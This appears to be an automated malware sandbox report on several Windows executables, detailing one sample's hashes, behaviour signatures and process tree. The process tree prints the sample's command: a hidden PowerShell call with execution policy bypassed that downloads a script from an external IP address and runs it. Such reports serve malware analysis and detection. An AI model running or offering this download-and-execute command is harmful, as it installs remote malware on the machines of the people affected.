Overview
overview
10Static
static
101edc123e5a...1c.exe
windows7-x64
101edc123e5a...1c.exe
windows10-2004-x64
10215a9d6110...dd.exe
windows7-x64
7215a9d6110...dd.exe
windows10-2004-x64
7351e31a389...15.exe
windows7-x64
10351e31a389...15.exe
windows10-2004-x64
107c711ab33a...07.exe
windows7-x64
87c711ab33a...07.exe
windows10-2004-x64
10a6b647b495...2a.exe
windows7-x64
3a6b647b495...2a.exe
windows10-2004-x64
3d521f17349...54.exe
windows7-x64
10d521f17349...54.exe
windows10-2004-x64
10df468fc510...a2.exe
windows7-x64
10df468fc510...a2.exe
windows10-2004-x64
10Analysis
-
max time kernel
15s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
06/03/2025, 00:51
Behavioral task
behavioral1
Sample
1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral9
Sample
a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral11
Sample
d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe
Resource
win7-20250207-en
Behavioral task
behavioral12
Sample
d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral13
Sample
df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe
Resource
win10v2004-20250217-en
General
-
Target
7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe
-
Size
120KB
-
MD5
5b3ed060facb9d57d8d0539084686870
-
SHA1
9cae8c44e44605d02902c29519ea4700b4906c76
-
SHA256
7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
-
SHA512
6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a
-
SSDEEP
3072:EV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPQT:pt5hBPi0BW69hd1MMdxPe9N9uA069TB6
Malware Config
Signatures
-
pid Process 2904 powershell.exe 2160 powershell.exe 2160 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2160 powershell.exe 2160 powershell.exe 2160 powershell.exe 2904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 2904 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2576 wrote to memory of 1100 2576 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe 29 PID 2576 wrote to memory of 1100 2576 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe 29 PID 2576 wrote to memory of 1100 2576 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe 29 PID 1100 wrote to memory of 2160 1100 cmd.exe 31 PID 1100 wrote to memory of 2160 1100 cmd.exe 31 PID 1100 wrote to memory of 2160 1100 cmd.exe 31 PID 2160 wrote to memory of 2904 2160 powershell.exe 32 PID 2160 wrote to memory of 2904 2160 powershell.exe 32 PID 2160 wrote to memory of 2904 2160 powershell.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EBE5.tmp\EBE6.tmp\EBE7.bat C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
334B
MD53895cb9413357f87a88c047ae0d0bd40
SHA1227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA2568140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5123a8dceee35e6d67f2ef09bd6a5a475
SHA1d1770deaf44cad6b7324d9412fe89d514672d4a3
SHA2569c578d1a8db2196df672f942e5bd51e74f9cbfc0716a311c971ef83838595765
SHA5121c81ce4e932a73d5adaa053c0938586e3c7291c99a063b7ce6dca2a2754ce2b64fab31b9ba1a8b3e07c18302a3a924d3a5a2d66eb33211a2a4cfd17eef906bd0